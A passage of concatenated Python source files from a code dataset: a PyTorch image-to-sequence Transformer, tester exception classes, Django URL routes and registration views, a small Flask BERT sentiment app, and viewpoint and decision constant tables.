[init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device), \n init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device)] + \\\n self.src_attn_linears(\n init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device), \n memory, memory\n )[1:]\n\n def display(self, displaying):\n self.src_attn.display(displaying)\n \n def get_attention(self) -> Tensor:\n return self.src_attn.get_attention()\n\nclass TransformerEncoder(nn.Module):\n \"\"\"TransformerEncoder is a stack of N encoder layers\n\n Args:\n encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n num_layers: the number of sub-encoder-layers in the encoder (required).\n norm: the layer normalization component (optional).\n\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, encoder_layer: EncoderLayer, num_layers: int, norm=None):\n super(TransformerEncoder, self).__init__()\n self.layers = clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.displaying = False\n self.encoder_output = None\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n \"\"\"Pass the input through the encoder layers in turn.\n\n Args:\n src: the sequence to the encoder (required).\n mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = src\n if self.displaying:\n self.encoder_output = []\n for mod in self.layers:\n output = mod(output, src_mask=src_mask, src_padding_mask=src_key_padding_mask)\n if self.displaying:\n self.encoder_output.append(output)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n \n def get_encoder_output(self):\n if self.displaying:\n return self.encoder_output\n else:\n raise Exception('Not display mode! Cannot get the encoder outputs.')\n\n def display(self, displaying):\n self.displaying = displaying\n if not displaying:\n self.encoder_output = None\n\n\nclass TransformerDecoder(nn.Module):\n \"\"\"TransformerDecoder is a stack of N decoder layers\n\n Args:\n decoder_layer: an instance of the TransformerDecoderLayer() class (required).\n num_layers: the number of sub-decoder-layers in the decoder (required).\n norm: the layer normalization component (optional).\n\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, decoder_layer: DecoderLayer, num_layers: int, norm=None):\n super(TransformerDecoder, self).__init__()\n self.layers = clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.displaying = False\n self.decoder_output = []\n\n def forward(self, tgt: Tensor, memory: Tensor, \n tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None, \n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None,\n decode_mem_list: Optional[list] = None) -> Tensor:\n \"\"\"Pass the inputs (and mask) through the decoder layer in turn.\n\n Args:\n tgt: the sequence to the decoder (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = tgt\n if self.displaying:\n self.decoder_output = []\n for i in range(self.num_layers):\n mod = self.layers[i]\n decode_mem = decode_mem_list[i] if decode_mem_list is not None else None\n output = mod(\n output, memory, \n tgt_mask=tgt_mask, tgt_paddingg_mask=tgt_key_padding_mask,\n memory_mask=memory_mask, memory_padding_mask=memory_key_padding_mask,\n decode_mem=decode_mem\n )\n if self.displaying:\n self.decoder_output.append(output)\n if decode_mem_list is not None:\n decode_mem_list[i] = mod.self_attn_memory + mod.src_attn_memory\n \n if self.norm is not None:\n output = self.norm(output)\n\n return output\n \n def init_decode_memory(self, memory: Tensor, device) -> 'list[list[Tensor]]':\n decode_mem_list = [\n self.layers[i].init_decode_memory(memory=memory, device=device)\n for i in range(self.num_layers)\n ]\n return decode_mem_list\n\n def display(self, displaying):\n self.displaying = displaying\n if not displaying:\n self.decoder_output = None\n for mod in self.layers:\n mod.display(displaying)\n\n def get_attention(self) -> 'list[Tensor]':\n return [mod.get_attention() for mod in self.layers]\n\n def get_decoder_output(self):\n if self.displaying:\n return self.decoder_output\n else:\n raise Exception('Not display mode! Cannot get the decoder outputs.')\n \n def clear_cache(self):\n for i in range(self.num_layers):\n self.layers[i].clear_cache()\n\n\nclass Img2SeqTransformer(nn.Module):\n def __init__(self, feature_size: 'tuple[int, int]', extractor_name: str, pretrain: str,\n max_seq_len: int, tr_extractor: bool, num_encoder_layers: int, \n num_decoder_layers: int, d_model: int, nhead: int, vocab_size: int,\n dim_feedforward: int = 1024, dropout: float = 0.1, device: str='cpu'):\n super(Img2SeqTransformer, self).__init__()\n self.device = device\n self.d_model = d_model\n self.features_extractor = FeaturesExtractor(num_features=d_model, output_size=feature_size, \n extractor_name=extractor_name, pretrain=pretrain, tr_extractor=tr_extractor)\n encoder_layer = EncoderLayer(d_model=d_model, nhead=nhead,\n dim_feedforward=dim_feedforward, dropout=dropout)\n self.transformer_encoder = TransformerEncoder(encoder_layer, num_layers=num_encoder_layers)\n decoder_layer = DecoderLayer(d_model=d_model, nhead=nhead,\n dim_feedforward=dim_feedforward, dropout=dropout)\n self.transformer_decoder = TransformerDecoder(decoder_layer, num_layers=num_decoder_layers)\n\n self.generator = Linear(d_model, vocab_size)\n self.seq_emb = TokenEmbedding(vocab_size, d_model)\n self.positional_encoding_seq = PositionalEncodingNd(d_pos=1, max_size=max_seq_len, d_model=d_model, dropout=dropout)\n\n self.displaying = False\n self.feature = None\n\n def forward(self, img: Tensor, seq: Tensor):\n memory = self.encode(img)\n return self.decode(seq, memory)\n\n def scst(self, run=True):\n if run:\n for param in self.transformer_encoder.parameters():\n param.requires_grad = False\n else:\n for param in self.transformer_encoder.parameters():\n param.requires_grad = True\n\n def encode(self, img: Tensor, ft_size: 'Optional[list[int, int]]'=None) -> Tensor:\n '''\n batch_size = img.shape[0]\n '''\n features = self.features_extractor(img)\n if self.displaying:\n self.feature = features\n batch_size, ft_h, ft_w, n_feature = features.shape\n if ft_size is not None:\n ft_size[0] = ft_h\n ft_size[1] = ft_w\n features = features.view(batch_size, -1, n_feature)\n return self.transformer_encoder(src=features, src_mask=None, src_key_padding_mask=None)\n\n def decode(self, seq: Tensor, memory: Tensor) -> Tensor:\n seq_emb = self.positional_encoding_seq(self.seq_emb(seq))\n tgt_mask = self.generate_square_subsequent_mask(seq.shape[1], seq.device)\n tgt_padding_mask = seq == PAD_ID\n outs = self.transformer_decoder(tgt=seq_emb, memory=memory, tgt_mask=tgt_mask, memory_mask=None,\n tgt_key_padding_mask=tgt_padding_mask, memory_key_padding_mask=None)\n return self.generator(outs)\n\n def init_decode_memory(self, memory: Tensor):\n self.clear_cache()\n return self.transformer_decoder.init_decode_memory(memory=memory, device=self.device)\n\n def decode_step(self, seq: Tensor, decode_memory: list, pos: Optional[int]=None, tgt_padding_mask: Tensor=None) -> Tensor:\n '''\n decode for single step\n :param seq: the new input words. shape: (batch_size, 1)\n :param decode_mem_list: the memory while decoding. It stores the [key, value] for previous words.\n '''\n if seq.ndim == 1:\n seq = seq.unsqueeze(-1)\n if pos is None:\n pos = decode_memory[0][0].shape[1]\n if tgt_padding_mask is not None:\n assert tgt_padding_mask.shape[1] == pos + 1\n batch_size = seq.shape[0]\n memory = init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=self.device)\n seq_emb = self.positional_encoding_seq(x=self.seq_emb(seq), pos=(pos,))\n outs = self.transformer_decoder(tgt=seq_emb, memory=memory, tgt_mask=None, memory_mask=None,\n tgt_key_padding_mask=tgt_padding_mask, memory_key_padding_mask=None, \n decode_mem_list=decode_memory)\n return self.generator(outs).squeeze(1)\n\n def clear_cache(self):\n self.transformer_decoder.clear_cache()\n\n def display(self, displaying=True):\n self.displaying = displaying\n if not displaying:\n self.feature = None\n self.transformer_encoder.display(displaying=displaying)\n self.transformer_decoder.display(displaying=displaying)\n\n def get_attention(self):\n return self.transformer_decoder.get_attention()\n\n def get_feature(self):\n if self.displaying:\n return self.feature\n else:\n raise NotImplementedError(\"Not display mode! Cannot get the features.\")\n\n def get_encoder_output(self):\n return self.transformer_encoder.get_encoder_output()\n\n def get_decoder_output(self):\n return self.transformer_decoder.get_decoder_output()\n\n def generate_square_subsequent_mask(self, size: int, device: str):\n mask = 1.0 - torch.triu(torch.ones((size, size), device=device), 1)\n # mask = (torch.triu(torch.ones((size, size), device=device)) == 1).transpose(0, 1)\n # mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\nTransformerType = NewType('TransformerType', Img2SeqTransformer)\n\ndef _get_activation_fn(activation):\n if activation == \"relu\":\n return F.relu\n elif activation == \"gelu\":\n return F.gelu\n raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\ndef init_empty_tensor(batch_size: int, d_model: int, device):\n return torch.zeros((batch_size, 0, d_model), device=device)\n\n'''\ndef _cat(input: 'tuple[Tensor]', dim: int=0):\n input = tuple([x for x in input if x is not None])\n return torch.cat(input, dim=dim)\n'''","repo_name":"itoshiko/img2inchi","sub_path":"model/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":17000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20508870468","text":"from .misc import Credentials\n\n\nclass InvalidTesterTypeError(ValueError):\n def __init__(self, props: Credentials) -> None:\n self.props = props\n self.msg = f\"Can't identify Tester Type: {props.product}\"\n super().__init__(self.msg)\n\n\nclass TesterCommunicationError(Exception):\n def __init__(self, props: Credentials, error: Exception) -> None:\n self.props = props\n self.error = error\n self.msg = f\"Tester with credentials: {props} encountering communication error: {error}\"\n super().__init__(self.msg)\n\n\nclass IsDisconnectedError(Exception):\n \"\"\"Raises when tester is already disconnected.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Tester: <{self.tester_id}> is already disconnected.\"\n super().__init__(self.msg)\n\n\nclass IsConnectedError(Exception):\n \"\"\"Raises when tester is already connected.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Tester: <{self.tester_id}> is already connected.\"\n super().__init__(self.msg)\n\n\n# region Pool Exceptions\n\nclass UnknownResourceError(Exception):\n \"\"\"Raises when user trying to get acces to resource which is not known.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Unknown tester of id: <{self.tester_id}>.\"\n super().__init__(self.msg)\n\n# endregion\n","repo_name":"xenanetworks/open-automation-core","sub_path":"xoa_core/core/resources/resource/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"28158219023","text":"from django.conf.urls import url\n\nfrom . import views\n\n\n# HOME\nurlpatterns = [\n\n]\n\n# Partner\nurlpatterns += [\n url(r'^seznam/$', views.PartnerListView.as_view(), name='partner_list'),\n url(r'^(?P\\d+)/detail/$', views.PartnerDetailView.as_view(), name='partner_detail'),\n url(r'^create/$', views.PartnerCreateView.as_view(), name='partner_create'),\n url(r'^(?P\\d+)/update/$', views.PartnerUpdateView.as_view(), name='update'),\n url(r'^(?P\\d+)/update-komplet/$', views.PartnerUpdateKompletView.as_view(), name='partner_update_komplet'),\n # POP UP VIEWS\n url(r'^partner/popup-create/?$', views.PartnerPopupCreateView.as_view(), name='partner_popup_create'),\n url(r'^partner/popup-list/?$', views.PartnerPopUpListView.as_view(), name='partner_popup_list'),\n\n\n\n\n]\n\n# Oseba\nurlpatterns += [\n url(r'^oseba_create/$', views.OsebaCreateView.as_view(), name='oseba_create'),\n url(r'^oseba/popup-list/?$', views.OsebaPopUpListView.as_view(), name='oseba_popup_list'),\n]\n","repo_name":"vasjapavlovic/eda5","sub_path":"eda5/partnerji/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21014127790","text":"\"\"\" This is the main application. This makes prediction on input text using BERT model for sentiment analysis from Hugging face \"\"\"\r\n\r\nfrom flask import Flask, jsonify, render_template, request, make_response\r\nimport transformers\r\n\r\napp = Flask(__name__)\r\n\r\nhfmodel = transformers.pipeline('sentiment-analysis', model=\"nlptown/bert-base-multilingual-uncased-sentiment\")\r\n\r\n# Alternate model: Roberta, used for testing.\r\n# hfmodel = transformers.pipeline('sentiment-analysis', model=\"siebert/sentiment-roberta-large-english\")\r\n\r\n# inference\r\ndef get_prediction(message,model):\r\n results = model(message)\r\n return results\r\n\r\n@app.route('/', methods=['GET'])\r\ndef get():\r\n \"\"\"\r\n Demo test\r\n :return: some text\r\n \"\"\"\r\n return jsonify({\"Working\": \"Good!\"})\r\n\r\n@app.route('/', methods=['POST'])\r\ndef predict():\r\n message = request.json['text']\r\n results = get_prediction(message, hfmodel)\r\n my_prediction = f'The rating of this text is {results[0][\"label\"]} with probability of {results[0][\"score\"]*100}%.'\r\n return my_prediction\r\n\r\nif __name__ == '__main__':\r\n # starting app\r\n app.run(debug=True,host='0.0.0.0')\r\n","repo_name":"pallavis08/flask_nginx_gunicorn","sub_path":"app/create_app.py","file_name":"create_app.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70945761433","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm\n# Create your views here.\n\n\ndef logout_view(request):\n \"\"\" the cancellation of the user \"\"\"\n logout(request)\n return HttpResponseRedirect(reverse('learning_logs:index'))\n # must return render\n return render(request, 'learning_logs/index.html')\n\n\ndef register(request):\n \"\"\" register new user \"\"\"\n if request.method != 'POST':\n # the empty registration form is displayed\n form = UserCreationForm()\n else:\n # process the completed form\n form = UserCreationForm(data=request.POST)\n\n if form.is_valid():\n new_user = form.save()\n # let the user login automatically and redirect to the home page\n authenticated_user = authenticate(\n username=new_user.username, password=request.POST['password1'])\n login(request, authenticated_user)\n return HttpResponseRedirect(reverse('learning_logs:index'))\n\n context = {'form': form}\n return render(request, 'users/register.html', context)\n","repo_name":"heyefu19920626/PythonLearning","sub_path":"learning_log/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25388527776","text":"import ubelt as ub\r\n\r\n\r\nclass _Common:\r\n ...\r\n\r\n\r\nclass _ConstHelper(type):\r\n \"\"\"\r\n Adds code and nice constants to an integer version of a class\r\n \"\"\"\r\n def __new__(cls, name, parents, dct):\r\n \"\"\"\r\n cls = META_DECISION\r\n code_cls = META_DECISION_CODE\r\n \"\"\"\r\n class CODE:\r\n pass\r\n\r\n class NICE:\r\n pass\r\n\r\n for key in dct.keys():\r\n if key.isupper():\r\n value = dct[key]\r\n if value is None or isinstance(value, int):\r\n code = dct['INT_TO_CODE'][value]\r\n nice = dct['INT_TO_NICE'][value]\r\n setattr(CODE, key, code)\r\n setattr(NICE, key, nice)\r\n\r\n dct['CODE'] = CODE\r\n dct['NICE'] = NICE\r\n # we need to call type.__new__ to complete the initialization\r\n return super(_ConstHelper, cls).__new__(cls, name, parents, dct)\r\n\r\n\r\nclass EVIDENCE_DECISION(_Common, metaclass=_ConstHelper):\r\n \"\"\"\r\n TODO: change to EVIDENCE_DECISION / VISUAL_DECISION\r\n Enumerated types of review codes and texts\r\n\r\n Notes:\r\n Unreviewed: Not comparared yet.\r\n nomatch: Visually comparable and the different\r\n match: Visually comparable and the same\r\n notcomp: Not comparable means it is actually impossible to determine.\r\n unknown: means that it was reviewed, but we just can't figure it out.\r\n \"\"\"\r\n UNREVIEWED = None\r\n NEGATIVE = 0\r\n POSITIVE = 1\r\n INCOMPARABLE = 2\r\n UNKNOWN = 3\r\n\r\n INT_TO_CODE = ub.odict([\r\n # (POSITIVE , 'match'),\r\n # (NEGATIVE , 'nomatch'),\r\n # (INCOMPARABLE , 'notcomp'),\r\n # (POSITIVE , 'positive'),\r\n # (NEGATIVE , 'negative'),\r\n # (INCOMPARABLE , 'incomparable'),\r\n # (UNKNOWN , 'unknown'),\r\n # (UNREVIEWED , 'unreviewed'),\r\n (POSITIVE , 'POSTV'),\r\n (NEGATIVE , 'NEGTV'),\r\n (INCOMPARABLE , 'INCMP'),\r\n (UNKNOWN , 'UNKWN'),\r\n (UNREVIEWED , 'UNREV'),\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (POSITIVE , 'Positive'),\r\n (NEGATIVE , 'Negative'),\r\n (INCOMPARABLE , 'Incomparable'),\r\n (UNKNOWN , 'Unknown'),\r\n (UNREVIEWED , 'Unreviewed'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n MATCH_CODE = CODE_TO_INT\r\n\r\n\r\nclass META_DECISION(_Common, metaclass=_ConstHelper):\r\n \"\"\"\r\n Enumerated types of review codes and texts\r\n\r\n Notes:\r\n unreviewed: we dont have a meta decision\r\n same: we know this is the same animal through non-visual means\r\n diff: we know this is the different animal through non-visual means\r\n\r\n Example:\r\n >>> assert hasattr(META_DECISION, 'CODE')\r\n >>> assert hasattr(META_DECISION, 'NICE')\r\n >>> code1 = META_DECISION.INT_TO_CODE[META_DECISION.NULL]\r\n >>> code2 = META_DECISION.CODE.NULL\r\n >>> assert code1 == code2\r\n >>> nice1 = META_DECISION.INT_TO_NICE[META_DECISION.NULL]\r\n >>> nice2 = META_DECISION.NICE.NULL\r\n >>> assert nice1 == nice2\r\n \"\"\"\r\n NULL = None\r\n DIFF = 0\r\n SAME = 1\r\n INT_TO_CODE = ub.odict([\r\n (NULL , 'null'),\r\n (DIFF , 'diff'),\r\n (SAME , 'same'),\r\n ])\r\n INT_TO_NICE = ub.odict([\r\n (NULL , 'NULL'),\r\n (DIFF , 'Different'),\r\n (SAME , 'Same'),\r\n ])\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass CONFIDENCE(_Common, metaclass=_ConstHelper):\r\n UNKNOWN = None\r\n GUESSING = 1\r\n NOT_SURE = 2\r\n PRETTY_SURE = 3\r\n ABSOLUTELY_SURE = 4\r\n\r\n INT_TO_CODE = ub.odict([\r\n (ABSOLUTELY_SURE, 'absolutely_sure'),\r\n (PRETTY_SURE, 'pretty_sure'),\r\n (NOT_SURE, 'not_sure'),\r\n (GUESSING, 'guessing'),\r\n (UNKNOWN, 'unspecified'),\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (ABSOLUTELY_SURE, 'Doubtless'),\r\n (PRETTY_SURE, 'Sure'),\r\n (NOT_SURE, 'Unsure'),\r\n (GUESSING, 'Guessing'),\r\n (UNKNOWN, 'Unspecified'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass QUAL(_Common, metaclass=_ConstHelper):\r\n EXCELLENT = 5\r\n GOOD = 4\r\n OK = 3\r\n POOR = 2\r\n JUNK = 1\r\n UNKNOWN = None\r\n\r\n INT_TO_CODE = ub.odict([\r\n (EXCELLENT , 'excellent'),\r\n (GOOD , 'good'),\r\n (OK , 'ok'),\r\n (POOR , 'poor'),\r\n (JUNK , 'junk'),\r\n (UNKNOWN , 'unspecified'),\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (EXCELLENT , 'Excellent'),\r\n (GOOD , 'Good'),\r\n (OK , 'OK'),\r\n (POOR , 'Poor'),\r\n (JUNK , 'Junk'),\r\n (UNKNOWN , 'Unspecified'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass VIEW(_Common, metaclass=_ConstHelper):\r\n \"\"\"\r\n categorical viewpoint using the faces of a Rhombicuboctahedron\r\n\r\n References:\r\n https://en.wikipedia.org/wiki/Rhombicuboctahedron\r\n \"\"\"\r\n UNKNOWN = None\r\n R = 1\r\n FR = 2\r\n F = 3\r\n FL = 4\r\n L = 5\r\n BL = 6\r\n B = 7\r\n BR = 8\r\n\r\n U = 9\r\n UF = 10\r\n UB = 11\r\n UL = 12\r\n UR = 13\r\n UFL = 14\r\n UFR = 15\r\n UBL = 16\r\n UBR = 17\r\n\r\n D = 18\r\n DF = 19\r\n DB = 20\r\n DL = 21\r\n DR = 22\r\n DFL = 23\r\n DFR = 24\r\n DBL = 25\r\n DBR = 26\r\n\r\n INT_TO_CODE = ub.odict([\r\n (UNKNOWN, 'unknown'),\r\n (R, 'right'),\r\n (FR, 'frontright'),\r\n (F, 'front'),\r\n (FL, 'frontleft'),\r\n (L, 'left'),\r\n (BL, 'backleft'),\r\n (B, 'back'),\r\n (BR, 'backright'),\r\n\r\n (U, 'up'),\r\n (UF, 'upfront'),\r\n (UB, 'upback'),\r\n (UL, 'upleft'),\r\n (UR, 'upright'),\r\n (UFL, 'upfrontleft'),\r\n (UFR, 'upfrontright'),\r\n (UBL, 'upbackleft'),\r\n (UBR, 'upbackright'),\r\n\r\n (D, 'down'),\r\n (DF, 'downfront'),\r\n (DB, 'downback'),\r\n (DL, 'downleft'),\r\n (DR, 'downright'),\r\n (DFL, 'downfrontleft'),\r\n (DFR, 'downfrontright'),\r\n (DBL, 'downbackleft'),\r\n (DBR, 'downbackright'),\r\n\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (UNKNOWN, 'Unknown'),\r\n (R, 'Right'),\r\n (FR, 'Front-Right'),\r\n (F, 'Front'),\r\n (FL, 'Front-Left'),\r\n (L, 'Left'),\r\n (BL, 'Back-Left'),\r\n (B, 'Back'),\r\n (BR, 'Back-Right'),\r\n\r\n (U, 'Up'),\r\n (UF, 'Up-Front'),\r\n (UB, 'Up-Back'),\r\n (UL, 'Up-Left'),\r\n (UR, 'Up-Right'),\r\n (UFL, 'Up-Front-Left'),\r\n (UFR, 'Up-Front-Right'),\r\n (UBL, 'Up-Back-Left'),\r\n (UBR, 'Up-Back-Right'),\r\n\r\n (D, 'Down'),\r\n (DF, 'Down-Front'),\r\n (DB, 'Down-Back'),\r\n (DL, 'Down-Left'),\r\n (DR, 'Down-Right'),\r\n (DFL, 'Down-Front-Left'),\r\n (DFR, 'Down-Front-Right'),\r\n (DBL, 'Down-Back-Left'),\r\n (DBR, 'Down-Back-Right'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n DIST = {\r\n # DIST 0 PAIRS\r\n (B, B): 0, (BL, BL): 0, (BR, BR): 0, (D, D): 0, (DB, DB): 0,\r\n (DBL, DBL): 0, (DBR, DBR): 0, (DF, DF): 0, (DFL, DFL): 0,\r\n (DFR, DFR): 0, (DL, DL): 0, (DR, DR): 0, (F, F): 0, (FL, FL): 0,\r\n (FR, FR): 0, (L, L): 0, (R, R): 0, (U, U): 0, (UB, UB): 0,\r\n (UBL, UBL): 0, (UBR, UBR): 0, (UF, UF): 0, (UFL, UFL): 0,\r\n (UFR, UFR): 0, (UL, UL): 0, (UR, UR): 0,\r\n\r\n # DIST 1 PAIRS\r\n (B, BL): 1, (B, BR): 1, (B, DB): 1, (B, DBL): 1, (B, DBR): 1,\r\n (B, UB): 1, (B, UBL): 1, (B, UBR): 1, (BL, DBL): 1, (BL, L): 1,\r\n (BL, UBL): 1, (BR, DBR): 1, (BR, R): 1, (BR, UBR): 1, (D, DB): 1,\r\n (D, DBL): 1, (D, DBR): 1, (D, DF): 1, (D, DFL): 1, (D, DFR): 1,\r\n (D, DL): 1, (D, DR): 1, (DB, DBL): 1, (DB, DBR): 1, (DBL, DL): 1,\r\n (DBL, L): 1, (DBR, DR): 1, (DBR, R): 1, (DF, DFL): 1, (DF, DFR): 1,\r\n (DF, F): 1, (DFL, DL): 1, (DFL, F): 1, (DFL, FL): 1, (DFL, L): 1,\r\n (DFR, DR): 1, (DFR, F): 1, (DFR, FR): 1, (DFR, R): 1, (DL, L): 1,\r\n (DR, R): 1, (F, FL): 1, (F, FR): 1, (F, UF): 1, (F, UFL): 1,\r\n (F, UFR): 1, (FL, L): 1, (FL, UFL): 1, (FR, R): 1, (FR, UFR): 1,\r\n (L, UBL): 1, (L, UFL): 1, (L, UL): 1, (R, UBR): 1, (R, UFR): 1,\r\n (R, UR): 1, (U, UB): 1, (U, UBL): 1, (U, UBR): 1, (U, UF): 1,\r\n (U, UFL): 1, (U, UFR): 1, (U, UL): 1, (U, UR): 1, (UB, UBL): 1,\r\n (UB, UBR): 1, (UBL, UL): 1, (UBR, UR): 1, (UF, UFL): 1, (UF, UFR): 1,\r\n (UFL, UL): 1, (UFR, UR): 1,\r\n\r\n # DIST 2 PAIRS\r\n (B, D): 2, (B, DL): 2, (B, DR): 2, (B, L): 2, (B, R): 2, (B, U): 2,\r\n (B, UL): 2, (B, UR): 2, (BL, BR): 2, (BL, D): 2, (BL, DB): 2,\r\n (BL, DBR): 2, (BL, DFL): 2, (BL, DL): 2, (BL, FL): 2, (BL, U): 2,\r\n (BL, UB): 2, (BL, UBR): 2, (BL, UFL): 2, (BL, UL): 2, (BR, D): 2,\r\n (BR, DB): 2, (BR, DBL): 2, (BR, DFR): 2, (BR, DR): 2, (BR, FR): 2,\r\n (BR, U): 2, (BR, UB): 2, (BR, UBL): 2, (BR, UFR): 2, (BR, UR): 2,\r\n (D, F): 2, (D, FL): 2, (D, FR): 2, (D, L): 2, (D, R): 2, (DB, DF): 2,\r\n (DB, DFL): 2, (DB, DFR): 2, (DB, DL): 2, (DB, DR): 2, (DB, L): 2,\r\n (DB, R): 2, (DB, UB): 2, (DB, UBL): 2, (DB, UBR): 2, (DBL, DBR): 2,\r\n (DBL, DF): 2, (DBL, DFL): 2, (DBL, DFR): 2, (DBL, DR): 2, (DBL, FL): 2,\r\n (DBL, UB): 2, (DBL, UBL): 2, (DBL, UBR): 2, (DBL, UFL): 2,\r\n (DBL, UL): 2, (DBR, DF): 2, (DBR, DFL): 2, (DBR, DFR): 2, (DBR, DL): 2,\r\n (DBR, FR): 2, (DBR, UB): 2, (DBR, UBL): 2, (DBR, UBR): 2,\r\n (DBR, UFR): 2, (DBR, UR): 2, (DF, DL): 2, (DF, DR): 2, (DF, FL): 2,\r\n (DF, FR): 2, (DF, L): 2, (DF, R): 2, (DF, UF): 2, (DF, UFL): 2,\r\n (DF, UFR): 2, (DFL, DFR): 2, (DFL, DR): 2, (DFL, FR): 2, (DFL, UBL): 2,\r\n (DFL, UF): 2, (DFL, UFL): 2, (DFL, UFR): 2, (DFL, UL): 2, (DFR, DL): 2,\r\n (DFR, FL): 2, (DFR, UBR): 2, (DFR, UF): 2, (DFR, UFL): 2,\r\n (DFR, UFR): 2, (DFR, UR): 2, (DL, DR): 2, (DL, F): 2, (DL, FL): 2,\r\n (DL, UBL): 2, (DL, UFL): 2, (DL, UL): 2, (DR, F): 2, (DR, FR): 2,\r\n (DR, UBR): 2, (DR, UFR): 2, (DR, UR): 2, (F, L): 2, (F, R): 2,\r\n (F, U): 2, (F, UL): 2, (F, UR): 2, (FL, FR): 2, (FL, U): 2,\r\n (FL, UBL): 2, (FL, UF): 2, (FL, UFR): 2, (FL, UL): 2, (FR, U): 2,\r\n (FR, UBR): 2, (FR, UF): 2, (FR, UFL): 2, (FR, UR): 2, (L, U): 2,\r\n (L, UB): 2, (L, UF): 2, (R, U): 2, (R, UB): 2, (R, UF): 2, (UB, UF): 2,\r\n (UB, UFL): 2, (UB, UFR): 2, (UB, UL): 2, (UB, UR): 2, (UBL, UBR): 2,\r\n (UBL, UF): 2, (UBL, UFL): 2, (UBL, UFR): 2, (UBL, UR): 2, (UBR, UF): 2,\r\n (UBR, UFL): 2, (UBR, UFR): 2, (UBR, UL): 2, (UF, UL): 2, (UF, UR): 2,\r\n (UFL, UFR): 2, (UFL, UR): 2, (UFR, UL): 2, (UL, UR): 2,\r\n\r\n # DIST 3 PAIRS\r\n (B, DF): 3, (B, DFL): 3, (B, DFR): 3, (B, FL): 3, (B, FR): 3,\r\n (B, UF): 3, (B, UFL): 3, (B, UFR): 3, (BL, DF): 3, (BL, DFR): 3,\r\n (BL, DR): 3, (BL, F): 3, (BL, R): 3, (BL, UF): 3, (BL, UFR): 3,\r\n (BL, UR): 3, (BR, DF): 3, (BR, DFL): 3, (BR, DL): 3, (BR, F): 3,\r\n (BR, L): 3, (BR, UF): 3, (BR, UFL): 3, (BR, UL): 3, (D, UB): 3,\r\n (D, UBL): 3, (D, UBR): 3, (D, UF): 3, (D, UFL): 3, (D, UFR): 3,\r\n (D, 